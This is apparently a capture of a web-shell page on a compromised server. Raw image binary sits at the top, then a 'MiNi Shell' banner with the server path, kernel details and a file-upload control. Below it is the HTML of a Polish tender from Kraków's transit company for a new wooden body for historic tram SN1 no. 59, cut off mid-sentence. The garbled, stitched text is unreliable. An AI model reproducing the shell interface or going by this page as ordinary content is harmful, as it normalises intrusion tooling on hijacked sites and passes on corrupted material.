JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221110/0043468001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie nowej konstrukcji drewnianej nadwozia dla zabytkowego wagonu typu SN1 nr 59.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejskie Przedsiębiorstwo Komunikacyjne Spółka Akcyjna w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003911311</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Wawrzyńca 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mpk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mpk.krakow.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Transport publiczny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie nowej konstrukcji drewnianej nadwozia dla zabytkowego wagonu typu SN1 nr 59.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-14a647e0-5f4f-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00434680</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpk-krakow.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu Zamawiający będzie się kontaktował z Wykonawcami przy użyciu<br/>środków komunikacji elektronicznej zgodnie z Rozporządzeniem w sprawie środków komunikacji elektronicznej za pośrednictwem<br/>Platformy zakupowej (https://mpk-krakow.logintrade.net) lub skrzynki mailowej Zamawiającego email: zamowienia@mpk.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Złożenie oferty jest możliwe bez<br/>logowania albo z zalogowaniem do Platformy zakupowej dostępnej pod adresem https://mpk-krakow.logintrade.net Sposoby złożenia<br/>oferty za pośrednictwem Platformy zostały opisane w Instrukcjach użytkowników Platformy. Wykonawca zamierzający złożyć ofertę<br/>poprzez Platformę zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https:/mpk-krakow.logintrade.net/rejestracja/ustawowe.html oraz zaakceptować regulamin korzystania z Platformy dostępny pod<br/>adresem: https://mpk-krakow.logintrade.net. Złożenie oferty poprzez Platformę oznacza akceptację regulaminu korzystania z<br/>Platformy.<br/>2. Wsparcia technicznego w zakresie działania Platformy udziela Logintrade SA ul. Legnicka 57D, lokal B/J, 54-203 Wrocław, nr tel.<br/>71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8.00 – 16.00.<br/>3. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z Platformy.<br/>4. Informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i<br/>odbioru danych.<br/>4.1. Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie:<br/>a) Dopuszczalne przeglądarki internetowe: Edge, Google Chrome, Mozilla Firefox, Opera<br/>b) dostęp do sieci internet;<br/>c) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>d) włączona obsługa JavaScript;<br/>e) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>f) zainstalowany Acrobat Reader;<br/>g) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy. Stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s.<br/>4.2. Dopuszczalne formaty przesyłanych danych to pliki o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx,<br/>xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Zamawiający rekomenduje wykorzystanie<br/>formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów .zip lub .7Z Z uwagi na<br/>obowiązujące przepisy prawa pliki złożone w formatach .rar .gif .bmp .numbrs .pages. zostaną uznane za złożone nieskutecznie.<br/>4.3. Dokumenty w formacie .pdf zaleca się podpisywać formatem PAdES. Pliki w innych formatach niż PDF zaleca się opatrzyć<br/>zewnętrznym podpisem XadES – wówczas plik z podpisem należy przekazywać łącznie z dokumentem podpisywanym.<br/>4.4. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>4.5. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>4.6. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować brakiem integralności plików.<br/>4.7. Plik załączony przez wykonawcę na Platformie i zapisany widoczny jest na Platformie jako zaszyfrowany. Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>4.8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>4.9. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy<br/>przetargowej - pod adresem: https://mpk-krakow.logintrade.net</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych osób fizycznych wskazanych w toku postępowania o<br/>udzielenie zamówienia, jest Miejskie Przedsiębiorstwo Komunikacyjne S.A. w Krakowie z siedzibą przy ul. św. Wawrzyńca 13 w<br/>Krakowie.<br/>Dane osobowe będą przetwarzane w celu udzielenia zamówienia oraz wypełnienia obowiązku archiwizacyjnego. Dane osobowe<br/>wskazanych osób będą przetwarzane na podstawie art. 6 ust. 1 lit. c) Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Podanie danych jest dobrowolne, ale niezbędne do<br/>przeprowadzenia postępowania o udzielenie zamówienia. Osobom, których dane dotyczą, przysługuje prawo do żądania dostępu do<br/>swoich danych osobowych, ich sprostowania, oraz do ograniczenia ich przetwarzania, z zastrzeżeniem, że żądanie ograniczenia<br/>przetwarzania danych nie będzie realizowane do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub<br/>konkursu. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może ani nie może naruszać integralności protokołu końcowego postępowania oraz jego załączników.<br/>w , o których mowa w dziale XI ustawy Prawo zamówień publicznych. Osoby, których dane dotyczą mają prawo do wniesienia skargi<br/>do Prezesa Urzędu Ochrony Danych Osobowych. Osobom, których dane dotyczą nie przysługuje prawo do usunięcia danych<br/>osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO , prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO , prawo sprzeciwu na podstawie art. 21 RODO, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. Dane osobowe będą przetwarzane przez okres 10 lat od roku<br/>następującego po roku, w którym zakończono postępowanie. Po upływie tego okresu dane zostaną zniszczone lub przekazane do<br/>Archiwum Narodowego.<br/>Odbiorcami Państwa danych osobowych będą te podmioty, którym mamy obowiązek przekazywania danych na gruncie<br/>obowiązujących przepisów prawa, w tym ustawy o dostępie do informacji publicznej oraz spółka PZP24.PL – sp. z o. o. siedzibą we<br/>Wrocławiu (54-203) przy ul. Legnickiej 57D lok. B/J, wpisana do rejestru przedsiębiorców Krajowego Rejestru Sądowego,<br/>prowadzonego przez Sąd Rejonowy dla Wrocławia Fabrycznej we Wrocławiu, VI Wydział Krajowego Rejestru Sądowego pod<br/>numerem KRS: 0000505029, REGON: 022393643, NIP: 8971797896, jako właściciel Platformy Zakupowej, na której Miejskie<br/>Przedsiębiorstwo Komunikacyjne S.A. w Krakowie prowadzi postępowania o udzielenie zamówienia publicznego. Platforma<br/>Zakupowa działa pod adresem: https://mpk-krakow.logintrade.net<br/>Po stronie Wykonawcy leży obowiązek uzyskania zgody osoby fizycznej na wskazanie jej danych w postępowaniu o udzielenie<br/>zamówienia, w tym w składanej ofercie.<br/>W przypadku jakichkolwiek pytań możliwy jest kontakt z Inspektorem Ochrony Danych Osobowych MPK S.A. w Krakowie poprzez<br/>adres email: iodo@mpk.krakow.pl lub telefonicznie +48 12 254 14 54.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Żądanie ograniczenia przetwarzania danych nie będzie realizowane do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu. Skorzystanie przez osobę, której dane dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności<br/>protokołu końcowego postępowania oraz jego załączników, o których mowa w dziale XI ustawy Prawo zamówień publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LP.281.198.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. OPIS PRZEDMIOTU ZAMÓWIENIA<br/>2.1. Przedmiotem zamówienia jest wykonanie nowej konstrukcji drewnianej nadwozia dla zabytkowego wagonu typu SN1 nr<br/>59 w oparciu o zdemontowaną starą konstrukcję wagonu i rysunków poglądowych wagonów nr 11111 Sanok i 18536 Graz.<br/>2.2. Wykonawca dokona pomiarów stalowej ramy, na której zostanie umieszczona przedmiotowa drewniana konstrukcja<br/>nadwozia.<br/>2.3. Zakres wykonania konstrukcji obejmuje:<br/>2.3.1. Wykonanie nowej konstrukcji drewnianej nadwozia w oparciu i z wykorzystaniem zdemontowanej starej konstrukcji<br/>wagonu:<br/>2.3.1.1. Podstawę nadwozia stanowi ramownica z drewna dębowego połączona śrubami stalowymi i elementami stalowymi<br/>z ramą stalową podwozia (rama dostarczona przez Zamawiającego). Przykręcenie ramownicy wykonuje Wykonawca.<br/>Ramownica składa się z belek wzdłużnych pod ścianami bocznymi, belek poprzecznych pod drzwiami przedziału<br/>pasażerskiego, belek poprzecznych w przedziale pod podłogą.<br/>2.3.1.2. Konstrukcja ścian bocznych przedziału pasażerskiego z drewna dębowego składa się z czterech słupów narożnych,<br/>słupów międzyokiennych, listew mocowania ławek, belek podokiennych, belek nadokiennych, belek stanowiących podstawę<br/>dachu.<br/>2.3.1.3. Konstrukcja dachu przedziału pasażerskiego ma podwójną konstrukcję z górnym doświetleniem w formie okienek<br/>wentylacyjnych mocowanych na zawiasach- oryginalne zawiasy i zamki okienek udostępni Zamawiający (jak w wagonie<br/>SN1 nr. 37).<br/>2.3.1.4. Konstrukcja dachów pomostów z belek giętych lub klejonych w kształcie litery C i z belek giętych lub klejonych<br/>(wręg) z drewna twardego. Dach pomostu w części ma podwójną konstrukcję z górnym doświetleniem w formie okienek<br/>mocowanych na zawiasach.<br/>2.3.2. Wykonanie dwóch ścian działowych pomiędzy przedziałem pasażerskim i pomostami, w części środkowej przedziału<br/>pasażerskiego wzmocnienie stalowe.<br/>2.3.3. Wykonanie drzwi wewnętrznych ( drzwi podwójne rozsuwane na boki) znajdujących się w ścianach działowych.<br/>2.3.4. Wykonanie drzwi zewnętrznych 4szt. Konstrukcje drzwi wykonane jako szkielet drewniany obudowany drewnem od<br/>wnętrza wagonu, pokryty blachą od zewnątrz bez zamków.<br/>2.3.5. Wykonanie rusztu podłogi w przedziale pasażerskim i na pomostach z desek z drewna dębowego łączonych na piórowpust.<br/>2.3.6. Wykonanie poszycia dachu z drewna iglastego mocowanego do wręg za pomocą wkrętów.<br/>2.3.7. W obszarze dla pasażerów zamontować okna w ramach drewnianych, do których wstawione będą szyby. W części<br/>środkowej przedziału pasażerskiego 4 okna opuszczane.<br/>2.3.8. Okna czołowe zamontowane na stałe. Okna narożne pomostu opuszczane. Okna boczne pomostu zamontowane na<br/>stałe.<br/>2.3.9. W miejscach widocznych należy zastosować wkręty mosiężne z rowkiem.<br/>2.3.10. Zabezpieczenie drewna, malowanie. Wykonawca uzgodni z Zamawiającym materiały lakiernicze.<br/>2.4. Przed przystąpieniem do prac wskazanych powyżej Wykonawca dokona pomiarów stalowej ramy, na której zostanie<br/>umieszczona wykonana przez niego drewniana konstrukcja nadwozia zbudowana w oparciu o zachowaną drewnianą<br/>konstrukcję wagonu.<br/>2.5. Wykonawca montaż elementów drewnianych na ramie stalowej wykona na terenie Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50224200-3 - Przywracanie do stanu użytkowego wagonów pasażerskich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał odbudowę pudła (drewnianej konstrukcji) wraz z<br/>wyposażeniem co najmniej jednego wagonu, który został dopuszczony do ruchu i eksploatowany w sieci tramwajowej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W<br/>celu potwierdzenia braku podstaw do wykluczenia z postępowania Zamawiający wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących dokumentów:<br/>1.1. informacji z Krajowego Rejestru Karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp; art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu;<br/>1.2. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik<br/>nr 5 do SWZ.;<br/>1.3. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków<br/>i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami<br/>lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>1.4. zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>1.5. oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp oraz dotyczące<br/>przesłanek wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego składane na podstawie art. 125 ust. 5 ustawy Pzp, według wzoru<br/>stanowiącego załącznik nr 6 do SWZ.<br/>1.6. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli 